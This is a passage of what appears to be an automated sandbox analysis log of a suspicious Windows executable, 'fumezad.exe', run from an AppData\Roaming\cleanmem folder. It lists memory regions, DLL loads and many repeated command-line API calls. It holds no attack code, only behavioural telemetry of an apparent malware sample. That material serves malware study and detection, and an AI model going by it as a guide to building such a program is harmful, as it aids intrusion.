"pagefile_0x00000000005c0000" filename = "" Region: id = 2464 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2465 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2466 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2467 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2468 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2469 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2470 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2471 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2472 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2473 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2474 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2475 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2476 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2477 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2478 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2479 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2480 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2481 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2482 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2483 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2484 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2527 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2528 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2529 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2530 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2531 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2532 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2533 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2534 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2535 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2536 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2537 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2538 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2539 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2540 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2541 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2542 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2543 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2544 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2545 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2546 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2547 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2548 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2549 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2550 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2551 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 2552 start_va = 0x5c0000 end_va = 0x5ddfff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2553 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2554 start_va = 0x10000000 end_va = 0x10006fff entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 2555 start_va = 0x5e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2590 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 2591 start_va = 0x1fb0000 end_va = 0x201afff entry_point = 0x1fb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2609 start_va = 0x890000 end_va = 0x8a9fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2610 start_va = 0x890000 end_va = 0x892fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2611 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2612 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2613 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Thread: id = 149 os_tid = 0x854 [0128.011] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76540000) returned 0x0 [0128.071] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x75390000) returned 0x0 [0128.084] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76160000) returned 0x0 [0128.113] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WTSAPI32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x74e90000) returned 0x0 [0128.128] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76770000) returned 0x0 [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602328*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6023a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602428*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6024a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602528*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6025a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602628*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6026a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602728*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6027a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602828*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6028a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602928*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.133] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6029a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.133] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602a28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602aa8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602b28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602ba8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602c28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602ca8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602d28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602da8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602e28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602ea8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602f28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x602fa8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603028*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6030a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603128*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6031a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.134] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603228*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.134] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6032a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603328*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6033a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603428*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6034a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603528*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6035a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603628*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6036a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603728*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6037a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603828*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6038a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603928*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6039a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" 